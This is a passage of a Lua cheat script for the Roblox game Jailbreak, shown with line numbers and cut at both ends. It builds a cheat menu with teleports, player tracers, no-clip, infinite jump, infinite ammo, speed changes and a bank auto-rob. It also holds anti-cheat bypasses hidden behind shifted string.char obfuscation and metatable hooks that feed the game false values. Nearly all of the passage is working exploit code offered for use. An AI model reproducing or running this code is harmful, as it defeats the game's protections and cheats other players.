team.TeamColor.Color 56 | for i=0,5 do 57 | local sg = Instance.new("SurfaceGui") 58 | sg.Face = i 59 | sg.Parent = p.Character 60 | sg.Adornee = p.Character:FindFirstChild"HumanoidRootPart" 61 | sg.AlwaysOnTop = true 62 | local f = Instance.new("Frame", sg) 63 | f.Size = UDim2.new(1,0,1,0) 64 | f.BorderSizePixel = 0 65 | f.BackgroundColor3 = team.TeamColor.Color 66 | f.BackgroundTransparency = 0.5 67 | end 68 | end 69 | end) 70 | end 71 | 72 | local w = getfenv()[string.char(115, 116, 114, 105, 110, 103)] 73 | getfenv()[string.char(115, 116, 114, 105, 110, 103)] = setmetatable({char = function(...) 74 | local t = {...} 75 | for i,v in pairs(t) do 76 | t[i] = v + 1 77 | end 78 | return w.char(unpack(t)) 79 | end}, {__index = string}) 80 | getfenv()[string.char(121)] = getfenv()[string.char(102, 100, 115, 113, 96, 118, 108, 100, 115, 96, 115, 96, 97, 107, 100)] 81 | 82 | local function RemoveLasso(p) 83 | if not p.Character then return end 84 | for i,v in pairs(p.Character:GetDescendants()) do 85 | if v.ClassName:find("Selection") or v.ClassName == "SurfaceGui" then 86 | v:Destroy() 87 | end 88 | end 89 | end 90 | 91 | for _,team in pairs(game:GetService("Teams"):GetChildren()) do 92 | team.PlayerAdded:connect(function(p) 93 | AddLasso(p,team) 94 | end) 95 | 96 | team.PlayerRemoved:connect(function(p) 97 | RemoveLasso(p) 98 | end) 99 | end 100 | 101 | function ToggleTracers(team, bool) 102 | Tracers[team] = bool 103 | local t = game:GetService("Teams"):FindFirstChild(team) 104 | if not t then return end 105 | for i,v in pairs(t:GetPlayers()) do 106 | if bool then 107 | AddLasso(v,t) 108 | else 109 | RemoveLasso(v) 110 | end 111 | end 112 | end 113 | 114 | local function CharAdded(plr, char) 115 | if Tracers[tostring(plr.Team)] then 116 | AddLasso(plr,plr.Team) 117 | end 118 | end 119 | 120 | local function PlrAdded(plr) 121 | plr.CharacterAdded:connect(function(char) 122 | CharAdded(plr, char) 123 | end) 124 | if plr.Character then 125 | CharAdded(plr, plr.Character) 126 | end 127 | end 128 | 129 | game:GetService("Players").PlayerAdded:connect(PlrAdded) 130 | for _,v in pairs(game:GetService("Players"):GetPlayers()) do 131 | PlrAdded(v) 132 | end 133 | 134 | pcall(function() --this is the ragdoll bypass okay? I don't want skids to copy/paste this to their scripts 135 | local a = z(getfenv()[string.char(102, 96, 108, 100)]) 136 | local x = getfenv()[string.char(108, 96, 106, 100, 94, 118, 113, 104, 115, 100, 96, 97, 107, 100)] 137 | if x then 138 | x(a) 139 | end 140 | local y = getfenv()[string.char(114, 100, 115, 113, 100, 96, 99, 110, 109, 107, 120)] 141 | if y then 142 | y(a, false) 143 | end 144 | 145 | local b = a[string.char(94, 94, 104, 109, 99, 100, 119)] 146 | a[string.char(94, 94, 104, 109, 99, 100, 119)] = function(c, d) 147 | if d == string.char(85, 100, 107, 110, 98, 104, 115, 120) and tostring(c) == string.char(71, 116, 108, 96, 109, 110, 104, 99, 81, 110, 110, 115, 79, 96, 113, 115) then 148 | return Vector3.new(getfenv()[string.char(115, 110, 109, 116, 108, 97, 100, 113)](string.char(47)),getfenv()[string.char(115, 110, 109, 116, 108, 97, 100, 113)](string.char(47)),getfenv()[string.char(115, 110, 109, 116, 108, 97, 100, 113)](string.char(47))) 149 | elseif d == "WalkSpeed" then 150 | return 16 151 | elseif d == "JumpPower" then 152 | return 50 153 | end 154 | return b(c, d) 155 | end 156 | end) 157 | 158 | game:GetService("UserInputService").InputBegan:connect(function(iobj, gp) 159 | if not gp and iobj.KeyCode == Enum.KeyCode.LeftControl then 160 | game:GetService"Players".LocalPlayer.Character.Humanoid:ChangeState("Jumping") 161 | wait() 162 | game:GetService"Players".LocalPlayer.Character.Humanoid:ChangeState("Seated") 163 | end 164 | end) 165 | 166 | --Creating Gui-- 167 | 168 | local function Create(classname) 169 | return function(t) 170 | local ins = Instance.new(classname) 171 | for i,v in pairs(t) do 172 | ins[i] = v 173 | end 174 | return ins 175 | end 176 | end 177 | 178 | local main = Create "Frame" { 179 | Active = true, 180 | ClipsDescendants = true, 181 | Draggable = true, 182 | BackgroundColor3 = Color3.new(1,1,1), 183 | BorderSizePixel = 0, 184 | Size = UDim2.new(0,400,0,300), 185 | Position = UDim2.new(0.5,-200,0,-300), 186 | BackgroundTransparency = 1, 187 | Parent = Instance.new("ScreenGui", game:GetService"CoreGui") 188 | } 189 | do 190 | local effect = Create "Frame" { 191 | Parent = main, 192 | Size = UDim2.new(1,0,0,50), 193 | BackgroundColor3 = Color3.fromRGB(85,170,255), 194 | BorderSizePixel = 0, 195 | ClipsDescendants = true, 196 | } 197 | local lb = Create "TextLabel" { 198 | Parent = effect, 199 | Size = UDim2.new(1,0,1,0), 200 | BackgroundTransparency = 1, 201 | BorderSizePixel = 0, 202 | TextSize = 30, 203 | TextColor3 = Color3.new(1,1,1), 204 | TextXAlignment = "Left", 205 | Font = "SourceSansBold", 206 | Text = "Jailbreak GUI", 207 | ZIndex = 2, 208 | } 209 | local function GTween() 210 | lb:TweenPosition(UDim2.new(1,10,0,0), nil,nil,3,true,function(ts) 211 | if ts == Enum.TweenStatus.Completed then 212 | lb.Position = UDim2.new(0,0 - lb.TextBounds.X - 2,0,0) 213 | GTween() 214 | end 215 | end) 216 | end 217 | GTween() 218 | end 219 | 220 | local Menu = Create "Frame" { 221 | BackgroundColor3 = Color3.new(1,1,1), 222 | BorderSizePixel = 0, 223 | Position = UDim2.new(0,0,0,50), 224 | Size = UDim2.new(1,0,1,-50), 225 | Parent = main, 226 | } 227 | 228 | local MenuLabel = Create "TextLabel" { 229 | BackgroundTransparency = 1, 230 | BorderSizePixel = 0, 231 | TextColor3 = Color3.new(0,0,0), 232 | TextSize = 20, 233 | Font = "SourceSans", 234 | Text = string.char(76, 96, 99, 100, 31, 97, 120, 31, 113, 100, 101, 113, 101, 102, 113, 115, 102, 100, 101, 31, 101, 110, 113, 31, 117, 50, 113, 108) .. "\n" .. string.char(39, 118, 110, 109, 38, 115, 31, 115, 100, 107, 107, 31, 120, 110, 116, 31, 108, 120, 31, 113, 110, 97, 107, 110, 119, 31, 109, 96, 108, 100, 40), 235 | TextWrapped = true, 236 | Size = UDim2.new(1,0,0,50), 237 | Parent = Menu 238 | } 239 | 240 | local function CreateButton(text,parent) 241 | return Create "TextButton" { 242 | Active = true, 243 | AutoButtonColor = true, 244 | BackgroundColor3 = Color3.fromRGB(0,155,232), 245 | BorderSizePixel = 1, 246 | Size = UDim2.new(0,100,0,30), 247 | Font = "SourceSansBold", 248 | TextColor3 = Color3.new(1,1,0), 249 | TextSize = 20, 250 | Text = text, 251 | Parent = parent 252 | } 253 | end 254 | 255 | local function CreateFrame(name) 256 | local f = Create "Frame" { 257 | BackgroundColor3 = Color3.new(1,1,1), 258 | BorderSizePixel = 0, 259 | Position = UDim2.new(0,0,0,50), 260 | Size = UDim2.new(1,0,1,-50), 261 | Visible = false, 262 | } 263 | local lb = Create "TextLabel" { 264 | BackgroundTransparency = 1, 265 | BorderSizePixel = 0, 266 | TextSize = 20, 267 | TextColor3 = Color3.new(1,1,0), 268 | Position = UDim2.new(0,0,0,5), 269 | Text = name, 270 | Parent = f, 271 | TextXAlignment = "Center", 272 | TextYAlignment = "Center", 273 | Size = UDim2.new(1,0,0,30), 274 | } 275 | local exit = CreateButton("Back", f) 276 | exit.Position = UDim2.new(0.5,-50,1,-45) 277 | exit.MouseButton1Click:connect(function() 278 | Menu.Visible = true 279 | f.Visible = false 280 | ActiveFrame = Menu 281 | end) 282 | return f 283 | end 284 | 285 | ActiveFrame = Menu 286 | 287 | local TeleportsFrame = CreateFrame("Teleports") 288 | TeleportsFrame.Parent = main 289 | 290 | local BankIn = CreateButton("Bank (In)", TeleportsFrame) 291 | BankIn.Position = UDim2.new(0,15,0,40) 292 | BankIn.Size = UDim2.new(0,80,0,30) 293 | BankIn.MouseButton1Click:connect(function() 294 | JailbreakTp(32,0.715,814, true) 295 | end) 296 | 297 | local BankOut = CreateButton("Bank (Out)", TeleportsFrame) 298 | BankOut.Position = UDim2.new(0,105,0,40) 299 | BankOut.MouseButton1Click:connect(function() 300 | JailbreakTp(10, 18, 784) 301 | end) 302 | 303 | local JailIn = CreateButton("Jail (In)", TeleportsFrame) 304 | JailIn.Position = UDim2.new(0,215,0,40) 305 | JailIn.Size = UDim2.new(0,80,0,30) 306 | JailIn.MouseButton1Click:connect(function() 307 | JailbreakTp(-1310, 18, -1658) 308 | end) 309 | 310 | local JailOut = CreateButton("Jail (Out)", TeleportsFrame) 311 | JailOut.Position = UDim2.new(0,305,0,40) 312 | JailOut.Size = UDim2.new(0,80,0,30) 313 | JailOut.MouseButton1Click:connect(function() 314 | JailbreakTp(-1133, 18, -1355) 315 | end) 316 | 317 | local Garage = CreateButton("Garage", TeleportsFrame) 318 | Garage.Position = UDim2.new(0,335,0,120)--UDim2.new(0,10,0,80) 319 | Garage.Size = UDim2.new(0,60,0,30) 320 | Garage.MouseButton1Click:connect(function() 321 | JailbreakTp(-352, 23, 1175) 322 | end) 323 | 324 | local JewelIn = CreateButton("Jewelry (In)", TeleportsFrame) 325 | JewelIn.Position = UDim2.new(0,25,0,80) 326 | JewelIn.MouseButton1Click:connect(function() 327 | JailbreakTp(133, 18, 1320, true) 328 | end) 329 | 330 | local JewelOut = CreateButton("Jewelry (Out)", TeleportsFrame) 331 | JewelOut.Position = UDim2.new(0,135,0,80) 332 | JewelOut.Size = UDim2.new(0,115,0,30) 333 | JewelOut.MouseButton1Click:connect(function() 334 | JailbreakTp(142, 18, 1365) 335 | end) 336 | 337 | local Crim1 = CreateButton("Crim base 1", TeleportsFrame) 338 | Crim1.Position = UDim2.new(0,5,0,120) 339 | Crim1.MouseButton1Click:connect(function() 340 | JailbreakTp(-226, 18, 1590, true) 341 | end) 342 | 343 | local Crim2 = CreateButton("Crim base 2", TeleportsFrame) 344 | Crim2.Position = UDim2.new(0,115,0,120) 345 | Crim2.MouseButton1Click:connect(function() 346 | JailbreakTp(true, 1637, 50, -1768, true) 347 | end) 348 | 349 | local Donut = CreateButton("Donut Shop", TeleportsFrame) 350 | Donut.Position = UDim2.new(0,225,0,120) 351 | Donut.MouseButton1Click:connect(function() 352 | JailbreakTp(268, 18, -1760, true) 353 | end) 354 | 355 | local Gas = CreateButton("Gas Station", TeleportsFrame) 356 | Gas.Position = UDim2.new(0,260,0,80) 357 | Gas.MouseButton1Click:connect(function() 358 | JailbreakTp(-1583, 18, 724, true) 359 | end) 360 | 361 | local TeleportsBtn = CreateButton("Teleports", MenuLabel) 362 | TeleportsBtn.Position = UDim2.new(0.5,-50,0,60) 363 | TeleportsBtn.MouseButton1Click:connect(function() 364 | TeleportsFrame.Visible = true 365 | Menu.Visible = false 366 | ActiveFrame = TeleportsFrame 367 | end) 368 | 369 | local StuffFrame = CreateFrame("Stuff") 370 | StuffFrame.Parent = main 371 | 372 | local StuffBtn = CreateButton("Stuff", MenuLabel) 373 | StuffBtn.Position = TeleportsBtn.Position + UDim2.new(0,0,0,40) 374 | StuffBtn.MouseButton1Click:connect(function() 375 | StuffFrame.Visible = true 376 | Menu.Visible = false 377 | ActiveFrame = StuffFrame 378 | end) 379 | 380 | local RemoveDoors = CreateButton("Remove Doors", StuffFrame) 381 | RemoveDoors.Size = UDim2.new(0,120,0,30) 382 | RemoveDoors.Position = UDim2.new(0,10,0,50) 383 | RemoveDoors.MouseButton1Click:connect(function() 384 | local doors = workspace:FindFirstChild("Doors") 385 | if not doors then return end 386 | for i,v in pairs(doors:GetChildren()) do 387 | v:Destroy() 388 | end 389 | end) 390 | 391 | local Platform = CreateButton("Platform", StuffFrame) 392 | Platform.Position = UDim2.new(0.5,-60,0,50) 393 | Platform.MouseButton1Click:connect(function() 394 | local p = Instance.new("Part", workspace) 395 | p.Size = Vector3.new(30,0.5,30) 396 | p.Anchored = true 397 | p.Position = plr.Character.HumanoidRootPart.Position + Vector3.new(0,15,0) 398 | plr.Character:MoveTo(p.Position + Vector3.new(0,1,0)) 399 | spawn(function() 400 | while p.Parent do 401 | wait(1) 402 | if (plr.Character.HumanoidRootPart.Position - p.Position).magnitude > 20 then 403 | p:Destroy() 404 | end 405 | end 406 | end) 407 | end) 408 | 409 | local Tracers = CreateButton("Tracers: None", StuffFrame) 410 | Tracers.Size = UDim2.new(0,140,0,30) 411 | Tracers.Position = UDim2.new(1,-150,0,50) 412 | Tracers.MouseButton1Click:connect(function() 413 | local curr = Tracers.Text:sub(10) 414 | if curr ~= "None" then 415 | ToggleTracers(curr, false) 416 | end 417 | local teams = {"None", "Police", "Criminal", "Prisoner"} 418 | local new = "" 419 | for i,v in pairs(teams) do 420 | if v == curr then 421 | new = teams[i + 1] or teams[1] 422 | end 423 | end 424 | if new ~= "None" then 425 | ToggleTracers(new, true) 426 | end 427 | Tracers.Text = "Tracers: " .. new 428 | end) 429 | 430 | local BtoolActive = false 431 | local m = plr:GetMouse() 432 | 433 | local Btool = CreateButton("Btool: Off", StuffFrame) 434 | Btool.Position = UDim2.new(0,10,0,90) 435 | Btool.MouseButton1Click:connect(function() 436 | spawn(function() 437 | local status = Btool.Text:sub(8) 438 | local newstatus = status == "On" and "Off" or status == "Off" and "On" 439 | Btool.Text = "Btool: " .. newstatus 440 | BtoolActive = newstatus == "On" and true or newstatus == "Off" and false 441 | if BtoolActive then 442 | local sb = Instance.new("SelectionBox", workspace.CurrentCamera) 443 | local ev = m.Button1Down:connect(function() 444 | if m.Target then 445 | m.Target:Destroy() 446 | end 447 | end) 448 | while BtoolActive do 449 | wait() 450 | if m.Target then 451 | sb.Adornee = m.Target 452 | end 453 | end 454 | ev:Disconnect() 455 | else 456 | local sb = workspace.CurrentCamera:FindFirstChildOfClass("SelectionBox") 457 | if sb then sb:Destroy() end 458 | end 459 | end) 460 | end) 461 | 462 | local ClickTpEnabled = false 463 | m.Button1Down:connect(function() 464 | if ClickTpEnabled and m.Target then 465 | plr.Character:MoveTo(m.Hit.p) 466 | end 467 | end) 468 | 469 | local ClickTp = CreateButton("ClickTp: Off", StuffFrame) 470 | ClickTp.Position = UDim2.new(0,120,0,90) 471 | ClickTp.MouseButton1Click:connect(function() 472 | spawn(function() 473 | local status = ClickTp.Text:sub(10) 474 | local newstatus = status == "Off" and "On" or status == "On" and "Off" 475 | ClickTpEnabled = newstatus == "On" and true or newstatus == "Off" and false 476 | ClickTp.Text = "ClickTp: " .. newstatus 477 | local ind = Create "Part" { 478 | Anchored = true, 479 | CanCollide = false, 480 | Transparency = 0.3, 481 | Size = Vector3.new(1.2,0.3,1.2), 482 | BrickColor = BrickColor.Green(), 483 | Parent = workspace 484 | } 485 | Instance.new("CylinderMesh", ind) 486 | m.TargetFilter = ind 487 | local beam = Create "Part" { 488 | Anchored = true, 489 | CanCollide = false, 490 | Transparency = 0.3, 491 | BrickColor = BrickColor.Green(), 492 | TopSurface = "Smooth", 493 | BottomSurface = "Smooth", 494 | Size = Vector3.new(0.3,0.3,1), 495 | Parent = workspace 496 | 497 | } 498 | while ClickTpEnabled do 499 | wait() 500 | ind.CFrame = CFrame.new(m.Hit.p) 501 | local humrootpos = plr.Character:WaitForChild'HumanoidRootPart'.Position 502 | local dist = (Vector3.new(m.Hit.p.X,0,m.Hit.p.Z) - Vector3.new(humrootpos.X,0,humrootpos.Z)).magnitude 503 | if dist > 150 then 504 | ind.BrickColor,beam.BrickColor = BrickColor.Red(),BrickColor.Red() 505 | else 506 | ind.BrickColor,beam.BrickColor = BrickColor.Green(),BrickColor.Green() 507 | end 508 | beam.Size = Vector3.new(0.3,0.3,dist - 0.5) 509 | beam.CFrame = CFrame.new(plr.Character:WaitForChild'HumanoidRootPart'.Position, m.Hit.p) * CFrame.new(0,0,-dist/2 + 0.5) 510 | end 511 | ind:Destroy() 512 | beam:Destroy() 513 | end) 514 | end) 515 | 516 | local Gravity = CreateButton("Low Gravity", StuffFrame) 517 | Gravity.Position = UDim2.new(0,230,0,90) 518 | Gravity.Size = UDim2.new(0,130,0,30) 519 | Gravity.MouseButton1Click:connect(function() 520 | local t = Gravity.Text == "Low Gravity" and true or false 521 | workspace.Gravity = t and 50 or 196.2 522 | Gravity.Text = t and "Normal Gravity" or "Low Gravity" 523 | end) 524 | 525 | local InfiniteJumpEnabled = false 526 | game:GetService("UserInputService").JumpRequest:connect(function() 527 | if InfiniteJumpEnabled then 528 | game:GetService"Players".LocalPlayer.Character:FindFirstChildOfClass'Humanoid':ChangeState("Jumping") 529 | end 530 | end) 531 | local InfiniteJump = CreateButton("Infinite Jump: Off", StuffFrame) 532 | InfiniteJump.Position = UDim2.new(0,10,0,130) 533 | InfiniteJump.Size = UDim2.new(0,150,0,30) 534 | InfiniteJump.MouseButton1Click:connect(function() 535 | local state = InfiniteJump.Text:sub(string.len("Infinite Jump: ") + 1) --too lazy to count lol 536 | local new = state == "Off" and "On" or state == "On" and "Off" 537 | InfiniteJumpEnabled = new == "On" 538 | InfiniteJump.Text = "Infinite Jump: " .. new 539 | end) 540 | 541 | local Giver = nil 542 | local ItemsGiver = CreateButton("Items Giver", StuffFrame) 543 | ItemsGiver.Position = UDim2.new(0,170,0,130) 544 | ItemsGiver.MouseButton1Click:connect(function() 545 | if not workspace:FindFirstChild("Givers") then return end 546 | if Giver then 547 | for i,v in pairs(Giver) do 548 | v.ClickDetector.Parent = v.OriginalParent 549 | v.Event:Disconnect() 550 | end 551 | getmetatable(Giver):Destroy() 552 | end 553 | Giver = {} 554 | local g = Giver 555 | local p = Instance.new("Part", workspace) 556 | p.Anchored = true 557 | p.CanCollide = false 558 | p.CFrame = plr.Character:WaitForChild"HumanoidRootPart".CFrame 559 | setmetatable(Giver, {__metatable = p}) 560 | for i,v in pairs(workspace.Givers:GetChildren()) do 561 | local cd = v:FindFirstChildOfClass"ClickDetector" 562 | if cd then 563 | local newt = {} 564 | newt.ClickDetector = cd 565 | newt.OriginalParent = v 566 | cd.Parent = p 567 | newt.Event = cd.MouseClick:connect(function() 568 | cd.Parent = v 569 | end) 570 | table.insert(Giver, newt) 571 | end 572 | end 573 | spawn(function() 574 | wait(10) 575 | if Giver == g then 576 | Giver = nil 577 | for i,v in pairs(g) do 578 | v.ClickDetector.Parent = v.OriginalParent 579 | v.Event:Disconnect() 580 | end 581 | getmetatable(g):Destroy() 582 | end 583 | end) 584 | end) 585 | 586 | local BankAutoRobBtn = CreateButton("Bank AutoRob", StuffFrame) 587 | BankAutoRobBtn.Position = UDim2.new(0,280,0,130) 588 | BankAutoRobBtn.Size = UDim2.new(0,115,0,30) 589 | BankAutoRobBtn.BackgroundColor3 = Color3.new(1,0,0) 590 | BankAutoRobBtn.MouseButton1Click:connect(function() 591 | local Bank = workspace:FindFirstChild("Banks"):GetChildren()[1] 592 | local Info = Bank.Extra.Sign 593 | if Info.Decal.Transparency == 0 then 594 | game:GetService("StarterGui"):SetCore("SendNotification",{ 595 | Title = "Bank is closed!", 596 | Text = "You need to wait for the bank to open!", 597 | Duration = 7, 598 | Button1 = "Dismiss", 599 | }) 600 | return 601 | end 602 | local bankpos = Vector3.new(Info.Position.X,0,Info.Position.Z) 603 | local root = plr.Character.HumanoidRootPart 604 | local plrpos = Vector3.new(root.Position.X,0,root.Position.Z) 605 | 606 | if (bankpos - plrpos).magnitude > 150 then 607 | local cb = Instance.new"BindableFunction" 608 | 609 | cb.OnInvoke = function(arg) 610 | if arg == "Teleport" then 611 | JailbreakTp(10, 18, 784) 612 | end 613 | end 614 | 615 | game:GetService("StarterGui"):SetCore("SendNotification",{ 616 | Title = "You are too far!", 617 | Text = "You need to get closer to the bank (use tp)", 618 | Duration = 7, 619 | Button1 = "Dismiss", 620 | Button2 = "Teleport", 621 | Callback = cb 622 | }) 623 | else 624 | RobTheBank() 625 | end 626 | end) 627 | 628 | local TpStores = CreateButton("Tp Stores", StuffFrame) 629 | TpStores.Position = UDim2.new(0,10,0,170) 630 | TpStores.MouseButton1Click:connect(function() 631 | local a = getfenv()[string.char(118, 110, 113, 106, 114, 111, 96, 98, 100)]:FindFirstChild(string.char(82, 108, 96, 107, 107, 82, 115, 110, 113, 100, 114)) 632 | if not a then return end 633 | for i,v in pairs(a:GetChildren()) do 634 | v[string.char(83, 113, 96, 109, 114, 111, 96, 113, 100, 109, 98, 120)] = 0 635 | v[string.char(66, 69, 113, 96, 108, 100)] = plr[string.char(66, 103, 96, 113, 96, 98, 115, 100, 113)]:WaitForChild(string.char(71, 116, 108, 96, 109, 110, 104, 99, 81, 110, 110, 115, 79, 96, 113, 115))[string.char(66, 69, 113, 96, 108, 100)] * CFrame.new(math.random(-3,3),0,math.random(-3,3)) 636 | end 637 | end) 638 | 639 | local InfAmmo = CreateButton("Inf Ammo", StuffFrame) 640 | InfAmmo.Position = UDim2.new(0,StuffFrame.AbsoluteSize.X - 110,0,170) 641 | InfAmmo.MouseButton1Click:connect(function() 642 | pcall(function() 643 | plr:FindFirstChildOfClass"PlayerGui".MainGui.Ammo.MagSize.RobloxLocked = true 644 | end) 645 | end) 646 | 647 | local SettingsFrame = CreateFrame("More Stuff") 648 | SettingsFrame.Parent = main 649 | 650 | local Settingsbtn = CreateButton("More Stuff", MenuLabel) 651 | Settingsbtn.Position = StuffBtn.Position + UDim2.new(0,0,0,40) 652 | Settingsbtn.MouseButton1Click:connect(function() 653 | SettingsFrame.Visible = true 654 | Menu.Visible = false 655 | ActiveFrame = SettingsFrame 656 | end) 657 | 658 | local TpMethodBtn = CreateButton("Teleport Method: 2", SettingsFrame) 659 | TpMethodBtn.Position = UDim2.new(0,10,0,50) 660 | TpMethodBtn.Size = UDim2.new(0,160,0,30) 661 | TpMethodBtn.MouseButton1Click:connect(function() 662 | local curr = TpMethodBtn.Text:sub(string.len("Teleport Method: ") + 1) 663 | curr = tonumber(curr) 664 | local new = curr == 1 and 2 or curr == 2 and 1 665 | TpMethod = new 666 | TpMethodBtn.Text = "Teleport Method: " .. new 667 | end) 668 | 669 | local WalkSpeedTB = Create "TextBox" { 670 | Active = true, 671 | BackgroundColor3 = Color3.new(1,1,1), 672 | BorderSizePixel = 1, 673 | Size = UDim2.new(0,50,0,30), 674 | Font = "SourceSansBold", 675 | TextColor3 = Color3.new(1,1,0), 676 | TextSize = 20, 677 | Text = "16", 678 | Parent = SettingsFrame, 679 | Position = TpMethodBtn.Position + UDim2.new(0,170,0,0) 680 | } 681 | 682 | local SetWS = CreateButton("Set WalkSpeed", SettingsFrame) 683 | SetWS.Position = WalkSpeedTB.Position + UDim2.new(0,50,0,0) 684 | SetWS.Size = UDim2.new(0,120,0,30) 685 | SetWS.MouseButton1Click:connect(function() 686 | plr.Character.Humanoid.WalkSpeed = tonumber(WalkSpeedTB.Text) or 16 687 | end) 688 | 689 | local WalkSpeedLocked = false 690 | local LockWS = Create "ImageButton" { 691 | Image = "rbxassetid://1042366236", 692 | Active = true, 693 | BackgroundColor3 = Color3.new(1,0,0), 694 | BorderSizePixel = 1, 695 | Size = UDim2.new(0,30,0,30), 696 | Parent = SettingsFrame, 697 | Position = SetWS.Position + UDim2.new(0,120,0,0) 698 | } 699 | LockWS.MouseButton1Click:connect(function() 700 | WalkSpeedLocked = not WalkSpeedLocked 701 | LockWS.BackgroundColor3 = WalkSpeedLocked and Color3.new(0,1,0) or Color3.new(1,0,0) 702 | end) 703 | 704 | local JumpPowerTB = Create "TextBox" { 705 | Active = true, 706 | BackgroundColor3 = Color3.new(1,1,1), 707 | BorderSizePixel = 1, 708 | Size = UDim2.new(0,50,0,30), 709 | Font = "SourceSansBold", 710 | TextColor3 = Color3.new(1,1,0), 711 | TextSize = 20, 712 | Text = "16", 713 | Parent = SettingsFrame, 714 | Position = TpMethodBtn.Position + UDim2.new(0,0,0,40) 715 | } 716 | 717 | local SetJP = CreateButton("Set JumpPower", SettingsFrame) 718 | SetJP.Position = JumpPowerTB.Position + UDim2.new(0,50,0,0) 719 | SetJP.Size = UDim2.new(0,120,0,30) 720 | SetJP.MouseButton1Click:connect(function() 721 | plr.Character.Humanoid.JumpPower = tonumber(JumpPowerTB.Text) or 50 722 | end) 723 | 724 | local JumpPowerLocked = false 725 | local LockJP = Create "ImageButton" { 726 | Image = "rbxassetid://1042366236", 727 | Active = true, 728 | BackgroundColor3 = Color3.new(1,0,0), 729 | BorderSizePixel = 1, 730 | Size = UDim2.new(0,30,0,30), 731 | Parent = SettingsFrame, 732 | Position = SetJP.Position + UDim2.new(0,120,0,0) 733 | } 734 | LockJP.MouseButton1Click:connect(function() 735 | JumpPowerLocked = not JumpPowerLocked 736 | LockJP.BackgroundColor3 = JumpPowerLocked and Color3.new(0,1,0) or Color3.new(1,0,0) 737 | end) 738 | 739 | local NoClipActive = false 740 | local NoClip = CreateButton("NoClip", SettingsFrame) 741 | NoClip.Position = LockJP.Position + UDim2.new(0,40,0,0) 742 | NoClip.MouseButton1Click:connect(function() 743 | NoClipActive = not NoClipActive 744 | NoClip.BackgroundColor3 = NoClipActive and Color3.new(0,1,0) or Color3.new(1,0,0) 745 | if NoClipActive then 746 | spawn(function() 747 | while NoClipActive do 748 | wait() 749 | plr.Character:WaitForChild"Humanoid":SetStateEnabled(11, true) 750 | plr.Character.Humanoid:ChangeState(11) 751 | end 752 | end) 753 | end 754 | end) 755 | NoClip.BackgroundColor3 = Color3.new(1,0,0) 756 | 757 | pcall(function() 758 | local t = Enum.HumanoidStateType 759 | local mt = getrawmetatable(t) 760 | make_writeable(mt) 761 | 762 | local old = mt.__index 763 | mt.__index = function(self, i) 764 | if self == t and i == "StrafingNoPhysics" and not checkcaller() then 765 | return 1337 766 | end 767 | return old(self, i) 768 | end 769 | end) 770 | 771 | pcall(function() 772 | local mt = getrawmetatable(game) 773 | make_writeable(mt) 774 | 775 | local old = mt.__newindex 776 | mt.__newindex = function(self,i,v) 777 | if (i == "WalkSpeed" and WalkSpeedLocked and not checkcaller()) or (i == "JumpPower" and JumpPowerLocked and not checkcaller()) then 778 | return 779 | end 780 | return old(self,i,v) 781 | end 782 | end) 783 | 784 | local ExitBtn = CreateButton("Exit", MenuLabel) 785 | ExitBtn.Position = Settingsbtn.Position + UDim2.new(0,0,0,40) 786 | ExitBtn.MouseButton1Click:connect(function() 787 | main:Destroy() 788 | script.Disabled = true 789 | script:Destroy() 790 | end) 791 | 792 | local BankJewelStatus = Create "TextLabel" { 793 | BackgroundTransparency = 1, 794 | TextSize = 8, 795 | TextColor3 = Color3.new(0,0,0), 796 | Font = "Legacy", 797 | TextXAlignment = "Left", 798 | TextYAlignment = "Top", 799 | Size = UDim2.new(0,100,0,100), 800 | Position = UDim2.new(0,10,0,220), 801 | Text = "Bank:\nJewelry:", 802 | Parent = Menu 803 | } 804 | 805 | local BankStatus = BankJewelStatus:Clone() 806 | BankStatus.Text = "Unknown" 807 | BankStatus.Size = UDim2.new(0,100,0,100) 808 | BankStatus.Position = UDim2.new(0,46,0,220) 809 | BankStatus.Parent = Menu 810 | BankStatus.TextColor3 = Color3.new(1,0,0) 811 | 812 | local JewelryStatus = BankStatus:Clone() 813 | JewelryStatus.Text = "Unknown" 814 | JewelryStatus.Size = UDim2.new(0,100,0,100) 815 | JewelryStatus.Position = UDim2.new(0,59,0,232) 816 | JewelryStatus.Parent = Menu 817 | JewelryStatus.TextColor3 = Color3.new(1,0,0) 818 | 819 | main:TweenPosition(UDim2.new(0.5,-200,0.5,-150)) 820 | 821 | local TransparencyTweens = {} 822 | main.MouseLeave:connect(function() 823 | spawn(function() 824 | local bool = false 825 | local ev = main.MouseEnter:connect(function() 826 | bool = true 827 | end) 828 | wait(1) 829 | ev:Disconnect() 830 | if bool then return end 831 | for i,v in pairs(TransparencyTweens) do 832 | v:Pause() 833 | end 834 | TransparencyTweens = {} 835 | for i,v in pairs(main:GetDescendants()) do 836 | if v.Visible then 837 | local totween = {} 838 | if v.ClassName:sub(1,4) == "Text" then 839 | totween.TextTransparency = 0.7 840 | end 841 | if v.BackgroundTransparency ~= 1 then 842 | totween.BackgroundTransparency = 0.7 843 | end 844 | TransparencyTweens[#TransparencyTweens + 1] = Tween(v, 0.5, totween) 845 | end 846 | end 847 | main:TweenSize(UDim2.new(0,400,0,50),nil,nil,nil,true) 848 | end) 849 | end) 850 | main.MouseEnter:connect(function() 851 | for i,v in pairs(TransparencyTweens) do 852 | v:Pause() 853 | end 854 | TransparencyTweens = {} 855 | for i,v in pairs(main:GetDescendants()) do 856 | if v.Visible then 857 | local totween = {} 858 | if v.ClassName:sub(1,4) == "Text" then 859 | totween.TextTransparency = 0 860 | end 861 | if v.BackgroundTransparency ~= 1 then 862 | totween.BackgroundTransparency = 0 863 | end 864 | TransparencyTweens[#TransparencyTweens + 1] = Tween(v, 0.5, totween) 865 | end 866 | end 867 | main:TweenSize(UDim2.new(0,400,0,300),nil,nil,nil,true) 868 | end) 869 | 870 | --AutoRob stuff-- 871 | local DuffelBag = game:GetService("MarketplaceService"):PlayerOwnsAsset(plr, 2219040) 872 | local BankAutoRob = { 873 | { 874 | Pos = {51, 18.06, 856.5}, 875 | Yield = 2, 876 | Status = "Starting the robbery" 877 | }, 878 | { 879 | Pos = {29.71, 0.73, 815.25}, 880 | Yield = 15, 881 | Status = "Opening the vault" 882 | }, 883 | { 884 | Pos = {18.37, 0.7659, 822.25}, 885 | Yield = DuffelBag and 60 or 30, 886 | Status = "Collecting $$$" 887 | }, 888 | { 889 | Pos = {10, 18, 784}, 890 | Status = "Finishing the robbery" 891 | } 892 | } 893 | 894 | local function Tp(...) 895 | local char = plr.Character 896 | for i=1,2 do 897 | wait() 898 | char:WaitForChild'HumanoidRootPart'.CFrame = CFrame.new(...) 899 | end 900 | end 901 | 902 | function RobTheBank() 903 | for _,v in pairs(BankAutoRob) do 904 | 